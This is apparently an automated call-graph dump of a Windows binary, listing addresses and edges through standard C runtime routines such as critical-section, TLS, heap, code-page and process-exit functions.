6188->6189 6191 23233968 6189->6191 6192 232334f9 6189->6192 6206 23233be0 6189->6206 6193 23233972 ___vcrt_uninitialize_locks RtlDeleteCriticalSection 6191->6193 6192->6176 6194 232338e8 6192->6194 6193->6192 6224 23233af1 6194->6224 6199 23233918 6199->6173 6201 232338fd 6201->6173 6203 2323399c 6202->6203 6204 2323397d 6202->6204 6203->6176 6205 23233987 RtlDeleteCriticalSection 6204->6205 6205->6203 6205->6205 6211 23233a82 6206->6211 6208 23233bfa 6209 23233c18 InitializeCriticalSectionAndSpinCount 6208->6209 6210 23233c03 6208->6210 6209->6210 6210->6189 6212 23233aaa 6211->6212 6216 23233aa6 __crt_fast_encode_pointer 6211->6216 6212->6216 6217 232339be 6212->6217 6215 23233ac4 GetProcAddress 6215->6216 6216->6208 6222 232339cd try_get_first_available_module 6217->6222 6218 232339ea LoadLibraryExW 6220 23233a05 GetLastError 6218->6220 6218->6222 6219 23233a77 6219->6215 6219->6216 6220->6222 6221 23233a60 FreeLibrary 6221->6222 6222->6218 6222->6219 6222->6221 6223 23233a38 LoadLibraryExW 6222->6223 6223->6222 6225 23233a82 try_get_function 5 API calls 6224->6225 6226 23233b0b 6225->6226 6227 23233b24 TlsAlloc 6226->6227 6228 232338f2 6226->6228 6228->6201 6229 23233ba2 6228->6229 6230 23233a82 try_get_function 5 API calls 6229->6230 6231 23233bbc 6230->6231 6232 23233bd7 TlsSetValue 6231->6232 6233 2323390b 6231->6233 6232->6233 6233->6199 6234 2323391b 6233->6234 6235 2323392b 6234->6235 6236 23233925 6234->6236 6235->6201 6238 23233b2c 6236->6238 6239 23233a82 try_get_function 5 API calls 6238->6239 6240 23233b46 6239->6240 6241 23233b5e TlsFree 6240->6241 6242 23233b52 6240->6242 6241->6242 6242->6235 6246 23237470 6243->6246 6244 23232ada _ValidateLocalCookies 5 API calls 6245 232324a3 6244->6245 6245->6144 6245->6180 6246->6244 6248 23233c7f 6247->6248 6249 23233c59 6247->6249 6248->6187 6249->6248 6250 23233c69 FreeLibrary 6249->6250 6250->6249 6252 232324c4 6251->6252 6253 232324c8 6251->6253 6252->6148 6254 23232639 ___scrt_fastfail 4 API calls 6253->6254 6255 232324d5 ___scrt_release_startup_lock 6253->6255 6256 23232559 6254->6256 6255->6148 7266 232367bf 7271 232367f4 7266->7271 7269 232367db 7270 2323571e _free 20 API calls 7270->7269 7272 232367cd 7271->7272 7273 23236806 7271->7273 7272->7269 7272->7270 7274 23236836 7273->7274 7275 2323680b 7273->7275 7274->7272 7282 232371d6 7274->7282 7276 2323637b _abort 20 API calls 7275->7276 7278 23236814 7276->7278 7280 2323571e _free 20 API calls 7278->7280 7279 23236851 7281 2323571e _free 20 API calls 7279->7281 7280->7272 7281->7272 7283 232371e1 7282->7283 7284 23237209 7283->7284 7285 232371fa 7283->7285 7286 23237218 7284->7286 7291 23238a98 7284->7291 7287 23236368 _free 20 API calls 7285->7287 7298 23238acb 7286->7298 7290 232371ff ___scrt_fastfail 7287->7290 7290->7279 7292 23238aa3 7291->7292 7293 23238ab8 RtlSizeHeap 7291->7293 7294 23236368 _free 20 API calls 7292->7294 7293->7286 7295 23238aa8 7294->7295 7296 232362ac _abort 26 API calls 7295->7296 7297 23238ab3 7296->7297 7297->7286 7299 23238ae3 7298->7299 7300 23238ad8 7298->7300 7302 23238aeb 7299->7302 7308 23238af4 _abort 7299->7308 7310 232356d0 7300->7310 7303 2323571e _free 20 API calls 7302->7303 7306 23238ae0 7303->7306 7304 23238af9 7307 23236368 _free 20 API calls 7304->7307 7305 23238b1e RtlReAllocateHeap 7305->7306 7305->7308 7306->7290 7307->7306 7308->7304 7308->7305 7309 2323474f _abort 7 API calls 7308->7309 7309->7308 7311 2323570e 7310->7311 7315 232356de _abort 7310->7315 7312 23236368 _free 20 API calls 7311->7312 7314 2323570c 7312->7314 7313 232356f9 RtlAllocateHeap 7313->7314 7313->7315 7314->7306 7315->7311 7315->7313 7316 2323474f _abort 7 API calls 7315->7316 7316->7315 7552 23235bff 7560 23235d5c 7552->7560 7554 23235c13 7556 23235b7a _abort 20 API calls 7557 23235c1b 7556->7557 7558 23235c28 7557->7558 7559 23235c2b 11 API calls 7557->7559 7559->7554 7561 23235c45 _abort 5 API calls 7560->7561 7562 23235d83 7561->7562 7563 23235d9b TlsAlloc 7562->7563 7564 23235d8c 7562->7564 7563->7564 7565 23232ada _ValidateLocalCookies 5 API calls 7564->7565 7566 23235c09 7565->7566 7566->7554 7566->7556 6257 2323543d 6258 23235440 6257->6258 6261 232355a8 6258->6261 6272 23237613 6261->6272 6264 232355b8 6266 232355e0 6264->6266 6267 232355c2 IsProcessorFeaturePresent 6264->6267 6308 23234bc1 6266->6308 6269 232355cd 6267->6269 6302 232360e2 6269->6302 6311 23237581 6272->6311 6275 2323766e 6276 2323767a _abort 6275->6276 6277 232376a7 _abort 6276->6277 6278 23235b7a _abort 20 API calls 6276->6278 6284 232376a1 _abort 6276->6284 6292 2323771f 6277->6292 6328 23235671 RtlEnterCriticalSection 6277->6328 6278->6284 6279 232376f3 6280 23236368 _free 20 API calls 6279->6280 6281 232376f8 6280->6281 6325 232362ac 6281->6325 6284->6277 6284->6279 6285 232376d6 6284->6285 6357 2323bdc9 6285->6357 6289 2323777e 6299 232377a9 6289->6299 6330 23237665 6289->6330 6291 23237776 6293 23234bc1 _abort 28 API calls 6291->6293 6292->6289 6292->6291 6292->6299 6329 232356b9 RtlLeaveCriticalSection 6292->6329 6293->6289 6298 23237665 _abort 38 API calls 6298->6299 6333 2323782e 6299->6333 6300 2323780c 6300->6285 6301 23235af6 _abort 38 API calls 6300->6301 6301->6285 6303 232360fe ___scrt_fastfail 6302->6303 6304 2323612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6303->6304 6307 232361fb ___scrt_fastfail 6304->6307 6305 23232ada _ValidateLocalCookies 5 API calls 6306 23236219 6305->6306 6306->6266 6307->6305 6376 2323499b 6308->6376 6314 23237527 6311->6314 6313 232355ad 6313->6264 6313->6275 6315 23237533 ___DestructExceptionObject 6314->6315 6320 23235671 RtlEnterCriticalSection 6315->6320 6317 23237541 6321 23237575 6317->6321 6319 23237568 _abort 6319->6313 6320->6317 6324 232356b9 RtlLeaveCriticalSection 6321->6324 6323 2323757f 6323->6319 6324->6323 6360 23236231 6325->6360 6327 232362b8 6327->6285 6328->6292 6329->6291 6331 23235af6 _abort 38 API calls 6330->6331 6332 2323766a 6331->6332 6332->6298 6334 23237834 6333->6334 6336 232377fd 6333->6336 6375 232356b9 RtlLeaveCriticalSection 6334->6375 6336->6285 6336->6300 6337 23235af6 GetLastError 6336->6337 6338 23235b12 6337->6338 6339 23235b0c 6337->6339 6341 2323637b _abort 20 API calls 6338->6341 6344 23235b61 SetLastError 6338->6344 6340 23235e08 _abort 11 API calls 6339->6340 6340->6338 6342 23235b24 6341->6342 6343 23235b2c 6342->6343 6345 23235e5e _abort 11 API calls 6342->6345 6346 2323571e _free 20 API calls 6343->6346 6344->6300 6347 23235b41 6345->6347 6348 23235b32 6346->6348 6347->6343 6349 23235b48 6347->6349 6350 23235b6d SetLastError 6348->6350 6351 2323593c _abort 20 API calls 6349->6351 6352 232355a8 _abort 35 API calls 6350->6352 6353 23235b53 6351->6353 6354 23235b79 6352->6354 6355 2323571e _free 20 API calls 6353->6355 6356 23235b5a 6355->6356 6356->6344 6356->6350 6358 23232ada _ValidateLocalCookies 5 API calls 6357->6358 6359 2323bdd4 6358->6359 6359->6359 6361 23235b7a _abort 20 API calls 6360->6361 6362 23236247 6361->6362 6363 232362a6 6362->6363 6364 23236255 6362->6364 6371 232362bc IsProcessorFeaturePresent 6363->6371 6368 23232ada _ValidateLocalCookies 5 API calls 6364->6368 6366 232362ab 6367 23236231 _abort 26 API calls 6366->6367 6369 232362b8 6367->6369 6370 2323627c 6368->6370 6369->6327 6370->6327 6372 232362c7 6371->6372 6373 232360e2 _abort 8 API calls 6372->6373 6374 232362dc GetCurrentProcess TerminateProcess 6373->6374 6374->6366 6375->6336 6377 232349a7 _abort 6376->6377 6378 232349bf 6377->6378 6398 23234af5 GetModuleHandleW 6377->6398 6407 23235671 RtlEnterCriticalSection 6378->6407 6382 23234a65 6411 23234aa5 6382->6411 6386 23234a3c 6390 23234a54 6386->6390 6394 23234669 _abort 5 API calls 6386->6394 6387 232349c7 6387->6382 6387->6386 6408 2323527a 6387->6408 6388 23234a82 6414 23234ab4 6388->6414 6389 23234aae 6393 2323bdc9 _abort 5 API calls 6389->6393 6395 23234669 _abort 5 API calls 6390->6395 6397 23234ab3 6393->6397 6394->6390 6395->6382 6399 232349b3 6398->6399 6399->6378 6400 23234b39 GetModuleHandleExW 6399->6400 6401 23234b63 GetProcAddress 6400->6401 6405 23234b78 6400->6405 6401->6405 6402 23234b95 6404 23232ada _ValidateLocalCookies 5 API calls 6402->6404 6403 23234b8c FreeLibrary 6403->6402 6406 23234b9f 6404->6406 6405->6402 6405->6403 6406->6378 6407->6387 6422 23235132 6408->6422 6444 232356b9 RtlLeaveCriticalSection 6411->6444 6413 23234a7e 6413->6388 6413->6389 6445 23236025 6414->6445 6417 23234ae2 6420 23234b39 _abort 8 API calls 6417->6420 6418 23234ac2 GetPEB 6418->6417 6419 23234ad2 GetCurrentProcess TerminateProcess 6418->6419 6419->6417 6421 23234aea ExitProcess 6420->6421 6425 232350e1 6422->6425 6424 23235156 6424->6386 6426 232350ed ___DestructExceptionObject 6425->6426 6433 23235671 RtlEnterCriticalSection 6426->6433 6428 232350fb 6434 2323515a 6428->6434 6432 23235119 _abort 6432->6424 6433->6428 6437 23235182 6434->6437 6438 2323517a 6434->6438 6435 23232ada _ValidateLocalCookies 5 API calls 6436 23235108 6435->6436 6440 23235126 6436->6440 6437->6438 6439 2323571e _free 20 API calls 6437->6439 6438->6435 6439->6438 6443 232356b9 RtlLeaveCriticalSection 6440->6443 6442 23235130 6442->6432 6443->6442 6444->6413 6446 23236040 6445->6446 6447 2323604a 6445->6447 6449 23232ada _ValidateLocalCookies 5 API calls 6446->6449 6448 23235c45 _abort 5 API calls 6447->6448 6448->6446 6450 23234abe 6449->6450 6450->6417 6450->6418 6451 23235303 6454 232350a5 6451->6454 6463 2323502f 6454->6463 6457 2323502f 5 API calls 6458 232350c3 6457->6458 6467 23235000 6458->6467 6461 23235000 20 API calls 6462 232350d9 6461->6462 6464 23235048 6463->6464 6465 23232ada _ValidateLocalCookies 5 API calls 6464->6465 6466 23235069 6465->6466 6466->6457 6468 2323500d 6467->6468 6472 2323502a 6467->6472 6469 23235024 6468->6469 6470 2323571e _free 20 API calls 6468->6470 6471 2323571e _free 20 API calls 6469->6471 6470->6468 6471->6472 6472->6461 6473 23237103 GetCommandLineA GetCommandLineW 6594 2323af43 6595 2323af59 6594->6595 6596 2323af4d 6594->6596 6596->6595 6597 2323af52 CloseHandle 6596->6597 6597->6595 6598 23238640 6601 23238657 6598->6601 6602 23238665 6601->6602 6603 23238679 6601->6603 6604 23236368 _free 20 API calls 6602->6604 6605 23238693 6603->6605 6606 23238681 6603->6606 6607 2323866a 6604->6607 6613 23238652 6605->6613 6614 232354a7 6605->6614 6608 23236368 _free 20 API calls 6606->6608 6610 232362ac _abort 26 API calls 6607->6610 6611 23238686 6608->6611 6610->6613 6612 232362ac _abort 26 API calls 6611->6612 6612->6613 6615 232354c4 6614->6615 6621 232354ba 6614->6621 6616 23235af6 _abort 38 API calls 6615->6616 6615->6621 6617 232354e5 6616->6617 6622 23237a00 6617->6622 6621->6613 6623 23237a13 6622->6623 6624 232354fe 6622->6624 6623->6624 6630 23237f0f 6623->6630 6626 23237a2d 6624->6626 6627 23237a40 6626->6627 6628 23237a55 6626->6628 6627->6628 6765 23236d7e 6627->6765 6628->6621 6631 23237f1b ___DestructExceptionObject 6630->6631 6632 23235af6 _abort 38 API calls 6631->6632 6633 23237f24 6632->6633 6634 23237f72 _abort 6633->6634 6642 23235671 RtlEnterCriticalSection 6633->6642 6634->6624 6636 23237f42 6643 23237f86 6636->6643 6641 232355a8 _abort 38 API calls 6641->6634 6642->6636 6644 23237f94 __fassign 6643->6644 6646 23237f56 6643->6646 6644->6646 6650 23237cc2 6644->6650 6647 23237f75 6646->6647 6764 232356b9 RtlLeaveCriticalSection 6647->6764 6649 23237f69 6649->6634 6649->6641 6652 23237d42 6650->6652 6653 23237cd8 6650->6653 6654 2323571e _free 20 API calls 6652->6654 6676 23237d90 6652->6676 6653->6652 6656 23237d0b 6653->6656 6660 2323571e _free 20 API calls 6653->6660 6655 23237d64 6654->6655 6658 2323571e _free 20 API calls 6655->6658 6657 23237d2d 6656->6657 6662 2323571e _free 20 API calls 6656->6662 6659 2323571e _free 20 API calls 6657->6659 6661 23237d77 6658->6661 6664 23237d37 6659->6664 6666 23237d00 6660->6666 6663 2323571e _free 20 API calls 6661->6663 6668 23237d22 6662->6668 6669 23237d85 6663->6669 6670 2323571e _free 20 API calls 6664->6670 6665 23237dfe 6671 2323571e _free 20 API calls 6665->6671 6678 232390ba 6666->6678 6667 23237d9e 6667->6665 6677 2323571e 20 API calls _free 6667->6677 6706 232391b8 6668->6706 6674 2323571e _free 20 API calls 6669->6674 6670->6652 6675 23237e04 6671->6675 6674->6676 6675->6646 6718 23237e35 6676->6718 6677->6667 6679 232390cb 6678->6679 6705 232391b4 6678->6705 6680 232390dc 6679->6680 6681 2323571e _free 20 API calls 6679->6681 6682 232390ee 6680->6682 6683 2323571e _free 20 API calls 6680->6683 6681->6680 6684 23239100 6682->6684 6686 2323571e _free 20 API calls 6682->6686 6683->6682 6685 23239112 6684->6685 6687 2323571e _free 20 API calls 6684->6687 6688 23239124 6685->6688 6689 2323571e _free 20 API calls 6685->6689 6686->6684 6687->6685 6690 2323571e _free 20 API calls 6688->6690 6693 23239136 6688->6693 6689->6688 6690->6693 6691 23239148 6692 2323915a 6691->6692 6695 2323571e _free 20 API calls 6691->6695 6696 2323916c 6692->6696 6697 2323571e _free 20 API calls 6692->6697 6693->6691 6694 2323571e _free 20 API calls 6693->6694 6694->6691 6695->6692 6698 2323917e 6696->6698 6699 2323571e _free 20 API calls 6696->6699 6697->6696 6700 23239190 6698->6700 6702 2323571e _free 20 API calls 6698->6702 6699->6698 6701 232391a2 6700->6701 6703 2323571e _free 20 API calls 6700->6703 6704 2323571e _free 20 API calls 6701->6704 6701->6705 6702->6700 6703->6701 6704->6705 6705->6656 6707 232391c5 6706->6707 6717 2323921d 6706->6717 6708 2323571e _free 20 API calls 6707->6708 6709 232391d5 6707->6709 6708->6709 6710 232391e7 6709->6710 6712 2323571e _free 20 API calls 6709->6712 6711 232391f9 6710->6711 6713 2323571e _free 20 API calls 6710->6713 6714 2323920b 6711->6714 6715 2323571e _free 20 API calls 6711->6715 6712->6710 6713->6711 6716 2323571e _free 20 API calls 6714->6716 6714->6717 6715->6714 6716->6717 6717->6657 6719 23237e60 6718->6719 6720 23237e42 6718->6720 6719->6667 6720->6719 6724 2323925d 6720->6724 6723 2323571e _free 20 API calls 6723->6719 6725 23237e5a 6724->6725 6726 2323926e 6724->6726 6725->6723 6760 23239221 6726->6760 6729 23239221 __fassign 20 API calls 6730 23239281 6729->6730 6731 23239221 __fassign 20 API calls 6730->6731 6732 2323928c 6731->6732 6733 23239221 __fassign 20 API calls 6732->6733 6734 23239297 6733->6734 6735 23239221 __fassign 20 API calls 6734->6735 6736 232392a5 6735->6736 6737 2323571e _free 20 API calls 6736->6737 6738 232392b0 6737->6738 6739 2323571e _free 20 API calls 6738->6739 6740 232392bb 6739->6740 6741 2323571e _free 20 API calls 6740->6741 6742 232392c6 6741->6742 6743 23239221 __fassign 20 API calls 6742->6743 6744 232392d4 6743->6744 6745 23239221 __fassign 20 API calls 6744->6745 6746 232392e2 6745->6746 6747 23239221 __fassign 20 API calls 6746->6747 6748 232392f3 6747->6748 6749 23239221 __fassign 20 API calls 6748->6749 6750 23239301 6749->6750 6751 23239221 __fassign 20 API calls 6750->6751 6752 2323930f 6751->6752 6753 2323571e _free 20 API calls 6752->6753 6754 2323931a 6753->6754 6755 2323571e _free 20 API calls 6754->6755 6756 23239325 6755->6756 6757 2323571e _free 20 API calls 6756->6757 6758 23239330 6757->6758 6759 2323571e _free 20 API calls 6758->6759 6759->6725 6761 23239258 6760->6761 6762 23239248 6760->6762 6761->6729 6762->6761 6763 2323571e _free 20 API calls 6762->6763 6763->6762 6764->6649 6766 23236d8a ___DestructExceptionObject 6765->6766 6767 23235af6 _abort 38 API calls 6766->6767 6769 23236d94 6767->6769 6771 23236e18 _abort 6769->6771 6772 232355a8 _abort 38 API calls 6769->6772 6773 2323571e _free 20 API calls 6769->6773 6774 23235671 RtlEnterCriticalSection 6769->6774 6775 23236e0f 6769->6775 6771->6628 6772->6769 6773->6769 6774->6769 6778 232356b9 RtlLeaveCriticalSection 6775->6778 6777 23236e16 6777->6769 6778->6777 7317 23237a80 7318 23237a8d 7317->7318 7319 2323637b _abort 20 API calls 7318->7319 7320 23237aa7 7319->7320 7321 2323571e _free 20 API calls 7320->7321 7322 23237ab3 7321->7322 7323 2323637b _abort 20 API calls 7322->7323 7327 23237ad9 7322->7327 7324 23237acd 7323->7324 7326 2323571e _free 20 API calls 7324->7326 7325 23235eb7 11 API calls 7325->7327 7326->7327 7327->7325 7328 23237ae5 7327->7328 7567 23237bc7 7568 23237bd3 ___DestructExceptionObject 7567->7568 7569 23237c0a _abort 7568->7569 7575 23235671 RtlEnterCriticalSection 7568->7575 7571 23237be7 7572 23237f86 __fassign 20 API calls 7571->7572 7573 23237bf7 7572->7573 7576 23237c10 7573->7576 7575->7571 7579 232356b9 RtlLeaveCriticalSection 7576->7579 7578 23237c17 7578->7569 7579->7578 7580 2323a1c6 IsProcessorFeaturePresent 6779 2323a945 6781 2323a96d 6779->6781 6780 2323a9a5 6781->6780 6782 2323a997 6781->6782 6783 2323a99e 6781->6783 6788 2323aa17 6782->6788 6792 2323aa00 6783->6792 6789 2323aa20 6788->6789 6796 2323b19b 6789->6796 6793 2323aa20 6792->6793 6794 2323b19b __startOneArgErrorHandling 21 API calls 6793->6794 6795 2323a9a3 6794->6795 6797 2323b1da __startOneArgErrorHandling 6796->6797 6802 2323b25c __startOneArgErrorHandling 6797->6802 6806 2323b59e 6797->6806 6799 2323b286 6800 2323b8b2 __startOneArgErrorHandling 20 API calls 6799->6800 6801 2323b292 6799->6801 6800->6801 6803 23232ada _ValidateLocalCookies 5 API calls 6801->6803 6802->6799 6804 232378a3 __startOneArgErrorHandling 5 API calls 6802->6804 6805 2323a99c 6803->6805 6804->6799 6807 2323b5c1 __raise_exc RaiseException 6806->6807 6808 2323b5bc 6807->6808 6808->6802 6809 23232049 6811 23232055 ___DestructExceptionObject 6809->6811 6810 2323205e 6811->6810 6812 232320d3 6811->6812 6813 2323207d 6811->6813 6814 23232639 ___scrt_fastfail 4 API calls 6812->6814 6823 2323244c 6813->6823 6816 232320da 6814->6816 6817 23232082 6832 23232308 6817->6832 6819 23232087 __RTC_Initialize 6835 232320c4 6819->6835 6821 2323209f 6838 2323260b 6821->6838 6824 23232451 ___scrt_release_startup_lock 6823->6824 6825 23232455 6824->6825 6828 23232461 6824->6828 6826 2323527a _abort 20 API calls 6825->6826 6827 2323245f 6826->6827 6827->6817 6829 2323246e 6828->6829 6830 2323499b _abort 28 API calls 6828->6830 6829->6817 6831 23234bbd 6830->6831 6831->6817 6844 232334c7 RtlInterlockedFlushSList 6832->6844 6834 23232312 6834->6819 6846 2323246f 6835->6846 6837 232320c9 ___scrt_release_startup_lock 6837->6821 6839 23232617 6838->6839 6843 2323262d 6839->6843 6865 232353ed 6839->6865 6842 23233529 ___vcrt_uninitialize 8 API calls 6842->6843 6843->6810 6845 232334d7 6844->6845 6845->6834 6851 232353ff 6846->6851 6849 2323391b ___vcrt_uninitialize_ptd 6 API calls 6850 2323354d 6849->6850 6850->6837 6854 23235c2b 6851->6854 6855 23232476 6854->6855 6856 23235c35 6854->6856 6855->6849 6858 23235db2 6856->6858 6859 23235c45 _abort 5 API calls 6858->6859 6860 23235dd9 6859->6860 6861 23235df1 TlsFree 6860->6861 6864 23235de5 6860->6864 6861->6864 6862 23232ada _ValidateLocalCookies 5 API calls 6863 23235e02 6862->6863 6863->6855 6864->6862 6868 232374da 6865->6868 6870 232374f3 6868->6870 6869 23232ada _ValidateLocalCookies 5 API calls 6871 23232625 6869->6871 6870->6869 6871->6842 7333 23238a89 7336 23236d60 7333->7336 7337 23236d72 7336->7337 7338 23236d69 7336->7338 7340 23236c5f 7338->7340 7341 23235af6 _abort 38 API calls 7340->7341 7342 23236c6c 7341->7342 7343 23236d7e __fassign 38 API calls 7342->7343 7344 23236c74 7343->7344 7360 232369f3 7344->7360 7347 23236c8b 7347->7337 7348 232356d0 21 API calls 7349 23236c9c 7348->7349 7350 23236cce 7349->7350 7367 23236e20 7349->7367 7352 2323571e _free 20 API calls 7350->7352 7352->7347 7354 23236cc9 7355 23236368 _free 20 API calls 7354->7355 7355->7350 7356 23236d12 7356->7350 7377 232368c9 7356->7377 7357 23236ce6 7357->7356 7358 2323571e _free 20 API calls 7357->7358 7358->7356 7361 232354a7 __fassign 38 API calls 7360->7361 7362 23236a05 7361->7362 7363 23236a26 7362->7363 7364 23236a14 GetOEMCP 7362->7364 7365 23236a2b GetACP 7363->7365 7366 23236a3d 7363->7366 7364->7366 7365->7366 7366->7347 7366->7348 7368 232369f3 40 API calls 7367->7368 7369 23236e3f 7368->7369 7372 23236e90 IsValidCodePage 7369->7372 7374 23236e46 7369->7374 7376 23236eb5 ___scrt_fastfail 7369->7376 7370 23232ada _ValidateLocalCookies 5 API calls 7371 23236cc1 7370->7371 7371->7354 7371->7357 7373 23236ea2 GetCPInfo 7372->7373 7372->7374 7373->7374 7373->7376 7374->7370 7380 23236acb GetCPInfo 7376->7380 7453 23236886 7377->7453 7379 232368ed 7379->7350 7381 23236baf 7380->7381 7386 23236b05 7380->7386 7383 23232ada _ValidateLocalCookies 5 API calls 7381->7383 7385 23236c5b 7383->7385 7385->7374 7390 232386e4 7386->7390 7389 23238a3e 43 API calls 7389->7381 7391 232354a7 __fassign 38 API calls 7390->7391 7393 23238704 MultiByteToWideChar 7391->7393 7394 23238742 7393->7394 7395 232387da 7393->7395 7397 232356d0 21 API calls 7394->7397 7400 23238763 ___scrt_fastfail 7394->7400 7396 23232ada _ValidateLocalCookies 5 API calls 7395->7396 7398 23236b66 7396->7398 7397->7400 7404 23238a3e 7398->7404 7399 232387d4 7409 23238801 7399->7409 7400->7399 7402 232387a8 MultiByteToWideChar 7400->7402 7402->7399 7403 232387c4 GetStringTypeW 7402->7403 7403->7399 7405 232354a7 __fassign 38 API calls 7404->7405 7406 23238a51 7405->7406 7413 23238821 7406->7413 7410 2323881e 7409->7410 7411 2323880d 7409->7411 7410->7395 7411->7410 7412 2323571e _free 20 API calls 7411->7412 7412->7410 7414 2323883c 7413->7414 7415 23238862 MultiByteToWideChar 7414->7415 7416 2323888c 7415->7416 7425 23238a16 7415->7425 7419 232356d0 21 API calls 7416->7419 7421 232388ad 7416->7421 7417 23232ada _ValidateLocalCookies 5 API calls 7418 23236b87 7417->7418 7418->7389 7419->7421 7420 232388f6 MultiByteToWideChar 7422 2323890f 7420->7422 7436 23238962 7420->7436 7421->7420 7421->7436 7440 23235f19 7422->7440 7424 23238801 __freea 20 API calls 7424->7425 7425->7417 7427 23238971 7429 232356d0 21 API calls 7427->7429 7434 23238992 7427->7434 7428 23238939 7431 23235f19 11 API calls 7428->7431 7428->7436 7429->7434 7430 23238a07 7433 23238801 __freea 20 API calls 7430->7433 7431->7436 7432 23235f19 11 API calls 7435 232389e6 7432->7435 7433->7436 7434->7430 7434->7432 7435->7430 7437 232389f5 WideCharToMultiByte 7435->7437 7436->7424 7437->7430 7438 23238a35 7437->7438 7439 23238801 __freea 20 API calls 7438->7439 7439->7436 7441 23235c45 _abort 5 API calls 7440->7441 7442 23235f40 7441->7442 7445 23235f49 7442->7445 7448 23235fa1 7442->7448 7446 23232ada _ValidateLocalCookies 5 API calls 7445->7446 7447 23235f9b 7446->7447 7447->7427 7447->7428 7447->7436 7449 23235c45 _abort 5 API calls 7448->7449 7450 23235fc8 7449->7450 7451 23232ada _ValidateLocalCookies 5 API calls 7450->7451 7452 23235f89 LCMapStringW 7451->7452 7452->7445 7454 23236892 ___DestructExceptionObject 7453->7454 7461 23235671 RtlEnterCriticalSection 7454->7461 7456 2323689c 7462 232368f1 7456->7462 7460 232368b5 _abort 7460->7379 7461->7456 7474 23237011 7462->7474 7464 2323693f 7465 23237011 26 API calls 7464->7465 7466 2323695b 7465->7466 7467 23237011 26 API calls 7466->7467 7468 23236979 7467->7468 7469 232368a9 7468->7469 7470 2323571e _free 20 API calls 7468->7470 7471 232368bd 7469->7471 7470->7469 7488 232356b9 RtlLeaveCriticalSection 7471->7488 7473 232368c7 7473->7460 7475 23237022 7474->7475 7479 2323701e 7474->7479 7476 23237029 7475->7476 7481 2323703c ___scrt_fastfail 7475->7481 7477 23236368 _free 20 API calls 7476->7477 7478 2323702e 7477->7478 7480 232362ac _abort 26 API calls 7478->7480 7479->7464 7480->7479 7481->7479 7482 23237073 7481->7482 7483 2323706a 7481->7483 7482->7479 7485 23236368 _free 20 API calls 7482->7485 7484 23236368 _free 20 API calls 7483->7484 7486 2323706f 7484->7486 7485->7486 7487 232362ac _abort 26 API calls 7486->7487 7487->7479 7488->7473 6872 23235348 6873 23233529 ___vcrt_uninitialize 8 API calls 6872->6873 6874 2323534f 6873->6874 6875 23237b48 6885 23238ebf 6875->6885 6879 23237b55 6898 2323907c 6879->6898 6882 23237b7f 6883 2323571e _free 20 API calls 6882->6883 6884 23237b8a 6883->6884 6902 23238ec8 6885->6902 6887 23237b50 6888 23238fdc 6887->6888 6889 23238fe8 ___DestructExceptionObject 6888->6889 6922 23235671 RtlEnterCriticalSection 6889->6922 6891 2323905e 6936 23239073 6891->6936 6893 23238ff3 6893->6891 6895 23239032 RtlDeleteCriticalSection 6893->6895 6923 2323a09c 6893->6923 6894 2323906a _abort 6894->6879 6896 2323571e _free 20 API calls 6895->6896 6896->6893 6899 23239092 6898->6899 6900 23237b64 RtlDeleteCriticalSection 6898->6900 6899->6900 6901 2323571e _free 20 API calls 6899->6901 6900->6879 6900->6882 6901->6900 6903 23238ed4 ___DestructExceptionObject 6902->6903 6912 23235671 RtlEnterCriticalSection 6903->6912 6905 23238f77 6917 23238f97 6905->6917 6906 23238ee3 6906->6905 6911 23238e78 66 API calls 6906->6911 6913 23237b94 RtlEnterCriticalSection 6906->6913 6914 23238f6d 6906->6914 6909 23238f83 _abort 6909->6887 6911->6906 6912->6906 6913->6906 6920 23237ba8 RtlLeaveCriticalSection 6914->6920 6916 23238f75 6916->6906 6921 232356b9 RtlLeaveCriticalSection 6917->6921 6919 23238f9e 6919->6909 6920->6916 6921->6919 6922->6893 6924 2323a0a8 ___DestructExceptionObject 6923->6924 6925 2323a0b9 6924->6925 6926 2323a0ce 6924->6926 6927 23236368 _free 20 API calls 6925->6927 6933 2323a0c9 _abort 6926->6933 6939 23237b94 RtlEnterCriticalSection 6926->6939 6929 2323a0be 6927->6929 6931 232362ac _abort 26 API calls 6929->6931 6930 2323a0ea 6940 2323a026 6930->6940 6931->6933 6933->6893 6934 2323a0f5 6956 2323a112 6934->6956 7204 232356b9 RtlLeaveCriticalSection 6936->7204 6938 2323907a 6938->6894 6939->6930 6941 2323a033 6940->6941 6942 2323a048 6940->6942 6943 23236368 _free 20 API calls 6941->6943 6947 2323a043 6942->6947 6959 23238e12 6942->6959 6944 2323a038 6943->6944 6946 232362ac _abort 26 API calls 6944->6946 6946->6947 6947->6934 6949 2323907c 20 API calls 6950 2323a064 6949->6950 6965 23237a5a 6950->6965 6952 2323a06a 6972 2323adce 6952->6972 6955 2323571e _free 20 API calls 6955->6947 7203 23237ba8 RtlLeaveCriticalSection 6956->7203 6958 2323a11a 6958->6933 6960 23238e26 6959->6960 6961 23238e2a 6959->6961 6960->6949 6961->6960 6962 23237a5a 26 API calls 6961->6962 6963 23238e4a 6962->6963 6987 23239a22 6963->6987 6966 23237a66 6965->6966 6967 23237a7b 6965->6967 6968 23236368 _free 20 API calls 6966->6968 6967->6952 6969 23237a6b 6968->6969 6970 232362ac _abort 26 API calls 6969->6970 6971 23237a76 6970->6971 6971->6952 6973 2323adf2 6972->6973 6974 2323addd 6972->6974 6976 2323ae2d 6973->6976 6980 2323ae19 6973->6980 6975 23236355 __dosmaperr 20 API calls 6974->6975 6977 2323ade2 6975->6977 6978 23236355 __dosmaperr 20 API calls 6976->6978 6979 23236368 _free 20 API calls 6977->6979 6981 2323ae32 6978->6981 6985 2323a070 6979->6985 7160 2323ada6 6980->7160 6982 23236368 _free 20 API calls 6981->6982 6984 2323ae3a 6982->6984 6986 232362ac _abort 26 API calls 6984->6986 6985->6947 6985->6955 6986->6985 6988 23239a2e ___DestructExceptionObject 6987->6988 6989 23239a36 6988->6989 6990 23239a4e 6988->6990 7012 23236355 6989->7012 6991 23239aec 6990->6991 6995 23239a83 6990->6995 6993 23236355 __dosmaperr 20 API calls 6991->6993 6996 23239af1 6993->6996 7015 23238c7b RtlEnterCriticalSection 6995->7015 6999 23236368 _free 20 API calls 6996->6999 6997 23236368 _free 20 API calls 7006 23239a43 _abort 6997->7006 7001 23239af9 6999->7001 7000 23239a89 7002 23239aa5 7000->7002 7003 23239aba 7000->7003 7004 232362ac _abort 26 API calls 7001->7004 7005 23236368 _free 20 API calls 7002->7005 7016 23239b0d 7003->7016 7004->7006 7008 23239aaa 7005->7008 7006->6960 7010 23236355 __dosmaperr 20 API calls 7008->7010 7009 23239ab5 7067 23239ae4 7009->7067 7010->7009 